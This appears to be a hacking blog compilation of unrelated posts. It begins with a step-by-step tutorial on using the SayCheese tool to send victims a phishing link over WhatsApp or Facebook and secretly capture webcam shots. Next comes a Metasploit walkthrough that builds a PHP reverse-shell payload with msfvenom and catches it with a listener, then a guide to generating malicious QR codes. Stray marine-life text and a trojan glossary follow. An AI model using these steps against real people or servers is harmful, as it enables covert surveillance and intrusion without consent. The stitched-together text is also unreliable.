Hack Victim’s WebCam With a Link

Take Webcam Shots From Target Just Sending a Malicious Link

SayCheese is Tool Coded By The Linux Choice The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

How it works?
The tool generates a malicious HTTPS page using Serveo or Ngrok Port Forwarding methods, and a javascript code to cam requests using MediaDevices.getUserMedia.

The MediaDevices.getUserMedia() method prompts the user for permission to use a media input which produces a MediaStream with tracks containing the requested types of media. That stream can include, for example, a video track (produced by either a hardware or virtual video source such as a camera, video recording device, screen sharing service, and so forth), an audio track (similarly, produced by a physical or virtual audio source like a microphone, A/D converter, or the like), and possibly other track types.


Steps to Download and Install SayCheese

This script is available for both Linux and Windows. You can check the official repository of PhoneSploit here

Step 1 Execute the following command to clone the SayCheese repository into your Linux Or Download SayCheese

git clone https://github.com/thelinuxchoice/saycheese

Step 2 Go to SayCheese repository using cd command

cd saycheese

Step 3 Now We have to grant the permission to the saycheese.sh file by typing this following command

chmod +x saycheese.sh 

after executing all command successfully we can use our tool.
Steps to  use SayCheese

Setp 1 Now we just have to type the final command put this cmd into your command for executing SayChees

bash saycheese.sh 

Now you can see our tool is ready to use

As you can see you have two option Serveo.net or ngrok both services are used for port forwarding  you can use ngrok or serveo according to you hear I'm going to using ngrok

Step 2 For use ngrok service press 2 
now wait till downloding ngrok or wait for starting ngrok or php service



after Everything is done Successfully you get a link as you can see

Step 3 You can send this link over Whatsapp or Facebook or Gmail This will Work Fine.. if Your Victim Open’s it and give the permission to the camera

hear i'm opening this link into my phone and allow to camera that's it

When target opens our link you can see victim IP address as well as you can see SayCheese Start capturing shots and receiving file .



The Image File Will be Automatically Saved here in this folder ( SayCheese Folder )



That's Done you can see Camera received Files

 

Create PHP Backdoor Of Metasploit

we going to teach you how to manually create a PHP backdoor for Metasploit and then how to exploit it 

How it works?
php-reverse-shell. This tool is designed for those situations during a pentest where you have upload access to a webserver that's running PHP. ... It differs from web form-based shell which allows you to send a single command, then returns you the output.



Creating reverse shells using php scripts is generally quite easy and can be accomplished with just a small php and a program like netcat. Netcat would run as a listener (a socket server actually) and the php script has to be run on the victim server so that it connects back.
In this example we are going to create reverse shells in php using metasploit. Yes, its too big a tool for such a small task but looks cool anyway.
To brief up the basics about reverse shells remember that it has 2 components. First is the listener on local/hacker system that waits for incoming connections, and the second is the payload script/program that runs on target computer and is configured to connect to the listener and offer a shell.

 listener (hacker machine) ++--- reverse shell payload (victim machine)

Once the listener is connected, it can gets a shell which can be used to run any command (limited to the user privilege) on the target system.

Lets Start 

Task 1 Creating PHP Payload 

So the first step is to create our payload program. This is done using the msfpayload command and looks like this

msfvenom -p php/meterpreter/reverse_tcp LHOST=3.21.94.26 LPORT=1337 R > exploit.php

The above command would create a file called exploit.php which is the reverse shell payload. It is just a plain php script that is configured according to the LHOST and LPORT parameters.

or
You can create or configure file Manually using this script → Download script

 Note:- Here I'm using static public IP in your environment you have to port forward if don't have static IP
Now upload the exploit.php to the target system.

Task 2 Starting listener

Once the payload is uploaded, the next thing to do is to start our listener which will catch the incoming connection offer.

Step 1:- Start msfconsole and run the following commands

msfconsole

Step 2:-  Use multi/handler using following command

use exploit/multi/handler

Step 3:- set payload Type following command

set payload php/meterpreter/reverse_tcp 

Step 4:- set localhost (here is your machine address)

set lhost 3.21.94.26 

Step 5:- set local port number

set lport 1337

Step 6:- start listener using following command

exploit

Now the listener is ready. Now its time to run the php script on the server. Its uploaded, and now can be run by opening from the browser like a normal url.
http://targetmachine/some/path/exploit.php

http://targetmachine/some/path/exploit.php

As soon as the script starts running, msfconsole will indicate connection and meterpreter session would come upNow that meterpreter is up, its time to play with the system.

__________________________

Happy Hacking! (Please do not spam it, It's Just For Knowledge ...)

 

Malicious QR Code with QRGen

QRGen comes with a built-in library that contains lots of popular exploits, which is extremely useful if you have time to sit down with the same device you're looking to exploit and find out which one works. For a penetration tester looking to audit anything that uses a QR code scanner, merely buying the same scanner and running through the exploits can lead you to get the scanner to behave in unexpected ways. The categories of payloads available on QRGen can be accessed by using the -l flag and a number while running the script. The number and payload type are listed below.

• Command Injection

• Format String

• String Fuzzing

• SQL Injection

• Directory Traversal

• LFI

• XSS

• watch video

• 
  
  

• Install QRGen

  To start with QRGen, we'll need to download the repository from GitHub do perform the command below in a terminal window.

  git clone https://github.com/h0nus/QRGen
  cd QRGen
  pip3 install -r requirements.txt

  Generate Malicious QR Codes from a Payload Type

  After installing the packing, you can run the script by typing python3 qrgen.py as following −

  

  To start, let's create a payload containing format string payloads. To do so, run QRGen with the following argument.

  

  Finally, a series of QR codes will be generated, and the last one that was created will open automatically.

  

MARINE LIFE -COASTECHWITHBIO

MARINE LIFE         BY        COASTECHWITHBIO

Our ocean, coasts, and estuaries are home to diverse living things. These organisms take many forms, from the tiniest single-celled plankton to the largest animal on Earth, the blue whale. Understanding the life cycles, habits, habitats, and inter-relationships of marine life contributes to our understanding of the planet as a whole. Human influences and reliance on these species, as well as changing environmental conditions, will determine the future health of these marine inhabitants. Toxic spills, oxygen-depleted dead zones, marine debris, increasing ocean temperatures, overfishing, and shoreline development are daily threats to marine life. Part of NOAA's mission is to help protect these organisms and their habitats.

Python instagram scrapping tool

 Python instagram scrapping tool

Download insta.py

trojan horse

 

RAT stands for Remote Access Trojan or Remote Administration Tool. It is one of the most dangerous virus out their over the internet. Hacker can use RAT to get complete control to your computer. He can do basicly anything with your computer. Using RAT hacker can install keyloggers and other malicious viruses remotely to your computer, infect files on your system and more. In this post i will tell you about what hacker can do with your computer using RAT and tell you about some commonly use RAT by hackers.

 What is RAT ?

As i have told you in my introduction paragraph RAT is Remote Access trojan. It is a peace of software or program which hacker uses to get complete control of your computer. It can be send to you in form of images, videos or any other files. Their are some RAT that even your antivirus software can not detect.  So always be sure about what you are downloading from the internet and never save or download files that anonymous user send you  over the mail or in chat room.

 What You can do with RAT ?

Once a RAT is installed on any computer hacker can do almost anything with that computer. Some malicious task that you can do with RAT are listed below:

• Infecting Files
• Installing Keyloggers
• Controlling Computer
• Remotely start webcam, sounds, movies etc
• Using your PC to attack Website (DDOS)
• View Screen

 Harmless RAT or Good RAT

As you have seen how harmfull RAT are for your computer, but their are some good RAT which some of you might be using daily. You might have heard of TeamViewer, it is a software which you use to control some one’s computer with his permission for file transfer, sharing your screen and more.

 Some Commonly Used RAT

• ProRAT
• CyberGate RAT
• DarkComet RAT

• Exploit 
  Exploits are programs that contain data or code that takes advantage of a vulnerability within application software that’s running on your computer.

• Rootkit 
  Rootkits are designed to conceal certain objects or activities in your system. Often their main purpose is to prevent malicious programs being detected – in order to extend the period in which programs can run on an infected computer.

• Trojan-Banker 
  Trojan-Banker programs are designed to steal your account data for online banking systems, e-payment systems and credit or debit cards.

• Trojan-DDoS 
  These programs conduct DoS (Denial of Service) attacks against a targeted web address. By sending multiple requests – from your computer and several other infected computers – the attack can overwhelm the target address… leading to a denial of service.

• Trojan-Downloader 
  Trojan-Downloaders can download and install new versions of malicious programs onto your computer – including Trojans and adware.

• Trojan-Dropper 
  These programs are used by hackers in order to install Trojans and / or viruses – or to prevent the detection of malicious programs. Not all antivirus programs are capable of scanning all of the components inside this type of Trojan.

• Trojan-FakeAV 
  Trojan-FakeAV programs simulate the activity of antivirus software. They are designed to extort money from you – in return for the detection and removal of threats… even though the threats that they report are actually non-existent.

• Trojan-GameThief 
  This type of program steals user account information from online gamers.

• Trojan-IM 
  Trojan-IM programs steal your logins and passwords for instant messaging programs – such as ICQ, MSN Messenger, AOL Instant Messenger, Yahoo Pager, Skype and many more.

• Trojan-Ransom 
  This type of Trojan can modify data on your computer – so that your computer doesn’t run correctly or you can no longer use specific data. The criminal will only restore your computer’s performance or unblock your data, after you have paid them the ransom money that they demand.

• Trojan-SMS 
  These programs can cost you money – by sending text messages from your mobile device to premium rate phone numbers.

• Trojan-Spy 
  Trojan-Spy programs can spy on how you’re using your computer – for example, by tracking the data you enter via your keyboard, taking screen shots or getting a list of running applications.

• Trojan-Mailfinder 
  These programs can harvest email addresses from your computer.

• Other types of Trojans include:

  • Trojan-ArcBomb

  • Trojan-Clicker

  • Trojan-Notifier

  • Trojan-Proxy

  • Trojan-PSW 

How to protect yourself against Trojans

By installing effective anti-malware software, you can defend your devices – including PCs, laptops, Macs, tablets and smartphones – against Trojans. A rigorous anti-malware solution – such as Kaspersky Anti-Virus – will detect and prevent Trojan attacks on your PC, while Kaspersky Mobile Security can deliver world-class virus protection for Android smartphones. Kaspersky Lab has anti-malware products that defend the following devices against Trojans:

• Windows PCs
• Linux computers
• Apple Macs
• Smartphones
• Tablets

Other articles related to Trojans and products to remove Trojan virus

Related articles:

• What is a Computer Virus or a Computer Worm?
• Adware, Pornware and Riskware
• Who Creates Malware?

Related products to remove Trojan virus:

• Kaspersky Internet Security
• Kaspersky Anti-Virus
• Kaspersky Internet Security for Mac
• Kaspersky Internet Security for Android

Human growing and connected to the computer

 Human growing and connected to the computer